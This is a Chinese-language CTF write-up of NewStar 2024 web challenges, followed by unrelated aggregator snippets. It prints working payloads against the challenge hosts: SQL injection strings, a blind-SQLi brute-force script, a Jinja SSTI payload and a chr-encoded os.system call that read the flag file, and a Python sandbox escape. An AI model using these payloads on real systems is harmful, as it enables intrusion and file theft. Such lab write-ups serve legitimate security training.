2024newstarweb题解

news/2024/12/27 4:16:17/文章来源:https://www.cnblogs.com/dghh/p/18498577

w1

headach3

会赢吗

源码

image

flag碎片X1:
ZmxhZ3tXQTB3

再次查看源码
image

image

flag碎片X2:
IV95NF9yM2Fs

第三个页面也是直接查看源码
image

直接改源码

image

flag碎片X3:
MXlfR3I0c1B

下一个页面
image
直接禁用js
image

flag碎片X4:
fSkpKcyF9

ZmxhZ3tXQTB3IV95NF9yM2FsMXlfR3I0c1BfSkpKcyF9

base64解码即可的flag

image

智械危机

image

image

cmd即为要执行的命令
只进行一次cmd5
然后对key进行加工

image

image

image

PangBai 过家家(1)

image

image

image

image

代理即代表ua头

image

image

image

image

image

302问题直接浏览器刷新cookic之后发包即可
image

然后就是一个jwt伪造

image

密钥也给了
伪造
level:0

谢谢皮蛋

没有任何过滤的sql注入

0 union select 1,group_concat(id,des,value) from Fl4g#

image

w1

你能在一秒内打出八句英文吗

拷打ai写个脚本就行

import requests
from bs4 import BeautifulSoup# 定义 URL
base_url = "http://eci-2ze6n37avcrfpidlw6ba.cloudeci1.ichunqiu.com"
start_url = f"{base_url}/start"
submit_url = f"{base_url}/submit"# 设置会话
session = requests.Session()# 添加用户代理
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.61 Safari/537.36'
}# 请求函数
def fetch_page(url):try:response = session.get(url, headers=headers, timeout=10)response.raise_for_status()  # 检查状态码是否为 200return response.textexcept requests.exceptions.RequestException as e:print(f"Error fetching {url}: {e}")return None# 提交数据函数
def submit_data(value):try:payload = {'user_input': value}post_response = session.post(submit_url, data=payload, headers=headers)post_response.raise_for_status()print(f"Response from submit: {post_response.text}")except requests.exceptions.RequestException as e:print(f"Error submitting data: {e}")# 解析网页
def parse_text(html):soup = BeautifulSoup(html, 'html.parser')text_element = soup.find('p', id='text')if text_element:return text_element.get_text()else:print("No text element found with id='text'")return None# 主流程
def main():html = fetch_page(start_url)if html:value = parse_text(html)if value:print(f"Extracted text: {value}")submit_data(value)if __name__ == "__main__":main()

image

遗失的拉链

扫目录即可得到www.zip

image

image

md5数组绕过

image

谢谢皮蛋 plus

/**/绕过空格即可

0"union/**/select/**/1,group_concat(id,des,value)from/**/Fl4g#

image

PangBai 过家家(2)

dirsearch扫过之后发现是.git泄露

image

提出文件后开始寻找漏洞

image

找到并回复后门
image

去访问后门文件

image

image
image

简单的过一下就行

image

复读机

fenjing直接就能跑出来

image

{% print(url_for.__globals__['__builtins__']['eval']("__import__('os').popen('cat ../f*').read()"))%}

image

w3

blindsql1

盲注
偷的脚本

import requests,string,timeurl = 'http://eci-2ze0lw9o6hnu803z8kvw.cloudeci1.ichunqiu.com/'result = ''
for i in range(1,100):print(f'[+] Bruting at {i}')for c in string.ascii_letters + string.digits + ',_-{}':time.sleep(0.01)print('[+] Trying:', c)# tables = f'(Select(group_concat(table_name))from(infOrmation_schema.tables)where((table_schema)like(database())))'# tables = f'(Select(group_concat(column_name))from(infOrmation_schema.columns)where((table_name)like(\'secrets\')))'tables = f'(Select(group_concat(secret_value))from(secrets)where((secret_value)like(\'flag%\')))'char = f'(ord(mid({tables},{i},1)))'b = f'(({char})in({ord(c)}))'p = f'Alice\'and({b})#'res = requests.get(url, params={'student_name': p})if 'Alice' in res.text:print('[*]bingo:',c)result += cprint(result)break

臭皮踩踩背

不能再使用eval
并且
"builtins": None
利用f逃逸

f.__globals__['__builtins__'].open('/flag').read()

image

image
2024-10-28 15:04:49 星期一

Include Me

data协议想办法使base64之后的内容不包含=即可

image

image

臭皮的计算机

image

计算机页面有源码

过滤了全英文字母我们可以用全角英文绕过
但是""''也不能用了所以
我们里面的内容用chr绕过

__import__(chr(111)+chr(115)).system(chr(99)+chr(97)+chr(116)+chr(32)+chr(47)+chr(102)+chr(108)+chr(97)+chr(103))

这“照片”是你吗

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.hqwc.cn/news/827248.html

如若内容造成侵权/违法违规/事实不符,请联系编程知识网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

判断一个数是不是质数(素数)

​public static boolean isPrime(int n){if (n <= 3) { return n > 1;) for(int i = 2; i < n; i++){if (n % i == 0) { return false;} ) return true;} 质数(也称为素数)是指在大于1的自然数中,除了1和它本身以外不再有其他因数的数。换句话说,质数只能被1和它…

Roaring Bitmap

Roaring Bitmap原理 Roaring Bitmaps 就是一种压缩位图索引,后文统称 RBM,RBM 的用途和 Bitmap 很差不多(比如说索引),只是说从性能、空间利用率各方面更优秀了。 RBM 的主要思想并不复杂,简单来讲,有如下三条:我们将 32-bit 的范围 ([0, n)) 划分为 2^16 个桶,每一个…

36 自然语言处理

自然语言,人类语言 将语言拆分,然后处理 语音识别:语音转文字,本质是音素识别 语音合成

力扣新手村之1342、1672、412

LeetCode: 1342[将数字变成0的操作次数] 1672[最富有客户的资产总量] 412[Fizz Buzz]1342[将数字变成0的操作次数] 题目 链接 LeetCode1342[将数字变成0的操作次数] 详情实例 实例1实例2实例3提示题解 思路 判断 num 是否为0 不为0则判断 num 是否为偶数 num 是偶数则除以2 nu…

什么是java序列化?什么情况下需要序列化?

序列化的定义 Java 序列化是为了保存各种对象在内存中的状态,并且可以把保存的对象状态再读出来。序列化是一种用于处理对象流的机制,它将对象的内容转换成一种可以在网络之间传输的形式。反序列化则是将这种形式的对象恢复成原来的对象。 实现方式 序列化是通过实现​​Seri…

国内首位聋人 Android 软件工程师体验通义灵码,“这真是太棒了”

通义灵码 @workspace 功能发布后,收到了非常多新老朋友的积极反馈,其中被一位特别的朋友留下了深刻的印象。Hi 大家好! 我就是人见人爱、Bug 闪开的通义灵码!上个月,我上线了一项新能力: 体验通义灵码 @workspace:轻松分析项目结构,结合代码仓库理解工程、查询问答等补…

诛仙3:幻心千劫|单机安装教程|虚拟机一键端|GM工具包

天给大家带来一款单机游戏的架设:诛仙3-幻心千劫-16职业。游戏版本:v4.4.0 只适用于单机娱乐,此教程是本人亲测所写,踩坑无数,如果你是小白跟着教程走也是可以搭建 亲测视频演示 https://githubs.xyz/show/297.mp4游戏安装步骤 此游戏架设需要安装虚拟机,没有虚拟机的请…

2024.11.5总结

哦哦哦A: 题目可变为:从一个点 \(x\) 走到左侧或右侧第一个 \(\geq y(y \leq x)\) 的位置需要花费 \(l_{x}\) 或 \(r_{x}\) 的代价,多次查询最短路。 首先观察一个点 \(x\) 只往 \(a\) 值高于自己的位置走能走到哪些点。 找到左侧从 \(x\) 出发的后缀 \(\max\) ,右侧从 \(x…

设计模式速览

设计模式速览前言:资料来源吉大设计模式课程,自用 只提取应试回忆关键部分,省略优缺点说明,详细应用之类,扩展挑了常出现的1. 概述 1.1 类间关系 1.1.1 依赖(dependency): ​ 一个类A使用到了另一个类B,而这种使用关系是具有偶然性的、临时性的、非常弱的,但是B类的变化…

try-catch-finally 中,如果 catch 中 return 了,finally 还会执行吗

finally 一定会执行,即使是 catch 中 return 了,catch 中的 return 会等 finally 中的代码执行完之后,才会执行。下面提供了一段示例代码和运行结果。问题的核心在于当​​catch​​​块中有​​return​​​语句时,​​finally​​块是否还会被执行。 示例代码解析public …

Synchronized用过吗,其原理是什么

synchronized 是由一对 monitorenter/monitorexit 指令实现的,monitor 对象是同步的基本实现单元。在 Java 6 之前,monitor 的实现完全是依靠操作系统内部的互斥锁,因为需要进行用户态到内核态的切换,所以同步操作是一个无差别的重量级操作,性能也很低。但在 Java 6 的时候…